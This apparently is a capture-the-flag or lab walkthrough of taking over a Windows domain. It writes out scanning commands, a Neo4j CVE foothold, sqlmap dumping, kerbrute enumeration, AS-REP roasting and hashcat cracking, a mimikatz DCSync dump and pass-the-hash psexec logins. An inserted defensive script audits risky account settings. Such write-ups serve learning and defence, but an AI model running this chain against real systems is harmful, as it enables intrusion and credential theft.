Information gathering

Visiting the given IP directly still shows nothing, so scan it with fscan.

fscan.exe -h 39.98.108.27

Still nothing, so run a full port scan with rustscan, then use fscan to gather information on the open ports.

rustscan.exe -a 39.98.108.27 -r 1-65535

fscan.exe -h 39.98.108.27 -p 1337,7473,7474,7687,35145

7474-Neo4j-CVE-2021-34371

After getting a reverse shell, fetch the vshell implant with wget.

flag{838821b4-1509-4f21-b121-3fd2135a666c}

Hint: Kerberos

Internal network information gathering + tunnel

172.22.6.12     DC:DC-PROGAME.xiaorang.lab
Open 172.22.6.12:53
Open 172.22.6.12:135
Open 172.22.6.12:139
Open 172.22.6.12:88
Open 172.22.6.12:389
Open 172.22.6.12:445
Open 172.22.6.12:464
Open 172.22.6.12:593
Open 172.22.6.12:3268
Open 172.22.6.12:3389
Open 172.22.6.12:9389
Open 172.22.6.12:15774
Open 172.22.6.12:47001
Open 172.22.6.12:49664
Open 172.22.6.12:49665
Open 172.22.6.12:49666
Open 172.22.6.12:49667
Open 172.22.6.12:49671
Open 172.22.6.12:49674
Open 172.22.6.12:49675
Open 172.22.6.12:49678
Open 172.22.6.12:49687
Open 172.22.6.12:49771
Open 172.22.6.12:63357
172.22.6.25 XIAORANG\WIN2019
Open 172.22.6.25:135
Open 172.22.6.25:139
Open 172.22.6.25:445
Open 172.22.6.25:3389
Open 172.22.6.25:15774
Open 172.22.6.25:47001
Open 172.22.6.25:49665
Open 172.22.6.25:49666
Open 172.22.6.25:49664
Open 172.22.6.25:49668
Open 172.22.6.25:49667
Open 172.22.6.25:49669
Open 172.22.6.25:49670
Open 172.22.6.25:49675
Open 172.22.6.25:49676
172.22.6.36 ubuntu (already compromised)
172.22.6.38 ubuntu
80
22

Taking 172.22.6.38 via SQL injection

proxychains sqlmap -r 1.txt --dump-all

flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}

Logging into the system

Nothing there.

AS_REP Roasting against 172.22.6.12

We now have a pile of accounts; combined with the Kerberos hint above, AS_REP Roasting comes to mind.

Filter for valid usernames with kerbrute_linux_amd64

proxychains kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab 1.txt

Use GetNPUsers to find users that do not require Kerberos pre-authentication

proxychains impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile 1.txt xiaorang.lab/

Crack with hashcat

hashcat.exe -a 0 -m 18200 --force $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:20f355db7c4b460811e3430fb15654e0$4620c636dad1841a44bba33b52db3ff183d823e2efb4573096d2239116a6a1f25ab5ae0c403e0bc25c5a170a2d59edfc4e0619b575aaab8cbe178aee4a13842372fcd01c2ac7f932bf3abda48030bf1852ce1ea51c4b9c9b5b5b642f471016bfba207811bd94d416c07f147277a6161464f1fcb008cd3fd14ca8ffa6cca872361a1e0bc460abc4150a726c66c2bdcce440011b951a6aec7c6e82c6e8009807ef208269a798acb10296f7d4e7800f5144f13d65515dadaa8f14c1b7ce947231457176810e2af8363f72fdd593a938b13780c007bdd2d42d0e88e9d60faa55d7f6c93550f5b64bc5a0d3e71219 D:/ctf/web/wificrack/dict/rockyou.txt -w 3

zhangxin@XIAORANG.LAB:strawberry
wenshao@xiaorang.lab:hellokitty

proxychains xfreerdp3 /v:172.22.6.25 /u:wenshao /p:'hellokitty' /cert:ignore /drive:/tmp

Both accounts can log in to 172.22.6.25 over RDP, but not to the DC (it was never going to be that easy).

Taking the domain controller through a permission misconfiguration

Upload SharpHound to collect information (try several versions)

sharphound.exe -c All

The user YUXUAN has a HasSIDHistory edge to the domain admin group user Admin, so taking over YUXUAN is enough to dump Admin's hash.
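
The two account settings this chain relies on (an account that does not require Kerberos pre-authentication, and a SIDHistory entry pointing at a privileged principal) can be audited from a directory export. The following is an added example, not part of the original write-up; the record layout (userAccountControl as an integer, sIDHistory as SID strings) and every sample account and SID are constructed assumptions.

```python
# Added example: audit exported account records for the two settings abused above.
DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: Kerberos pre-auth not required
ACCOUNTDISABLE = 0x0002       # userAccountControl bit: account is disabled

# Well-known RIDs of privileged domain principals.
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}

def privileged_label(sid):
    """Return the name of a well-known privileged principal for this SID, or None."""
    if sid == "S-1-5-32-544":
        return "BUILTIN\\Administrators"
    parts = sid.split("-")
    # Domain principals: S-1-5-21-<three sub-authorities>-<RID>
    if len(parts) == 8 and parts[:4] == ["S", "1", "5", "21"] and parts[7].isdigit():
        return PRIVILEGED_RIDS.get(int(parts[7]))
    return None

def audit(accounts):
    """Return (account, issue, detail) tuples for risky account settings."""
    findings = []
    for acct in accounts:
        name, uac = acct["sAMAccountName"], int(acct["userAccountControl"])
        state = "disabled" if uac & ACCOUNTDISABLE else "enabled"
        if uac & DONT_REQ_PREAUTH:
            # An AS-REP for this account can be requested without its password.
            findings.append((name, "no_preauth", state))
        for sid in acct.get("sIDHistory", []):
            label = privileged_label(sid)
            if label:
                # The account's token carries this SID, so it inherits its rights.
                findings.append((name, "privileged_sid_history", label))
    return findings

# Constructed sample export (hypothetical accounts and domain SID).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE = [
    {"sAMAccountName": "alice", "userAccountControl": 512, "sIDHistory": []},
    {"sAMAccountName": "bob", "userAccountControl": 512 | DONT_REQ_PREAUTH},
    {"sAMAccountName": "carol", "userAccountControl": 66048,
     "sIDHistory": [DOMAIN + "-500"]},
    {"sAMAccountName": "dave", "userAccountControl": 514 | DONT_REQ_PREAUTH,
     "sIDHistory": [DOMAIN + "-1105"]},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```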

Run a round of information gathering with winPEAS

winPEASany.exe

This gives the plaintext username and password of the autologon account yuxuan.

Log in directly and dump the domain admin hash

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

Lateral movement with the hash

proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12

flag{65ab6c04-6670-4864-9373-584e3594c5f1}

proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/Administrator@172.22.6.25
